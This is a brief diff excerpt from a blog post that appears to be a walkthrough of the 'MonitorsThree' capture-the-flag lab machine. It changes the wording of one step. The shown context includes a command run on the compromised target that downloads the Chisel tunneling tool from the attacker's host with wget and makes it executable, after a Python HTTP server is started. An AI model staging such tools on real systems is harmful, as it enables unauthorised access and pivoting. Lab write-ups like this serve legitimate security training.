ChristElise/christelise.github.io/_posts/2024-12-21-monitorsthree-walkthrough.md

 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
 ```

-- We can use wget on the target to download Chisel from our attack host and run it in server mode.
+- Then we can use wget on the target to download Chisel from our attack host and run it in server mode.
 ```bash
 marcus@monitorsthree.htb:/tmp$ wget 10.10.14.16/chisel; chmod 755 chisel
 <SNIP>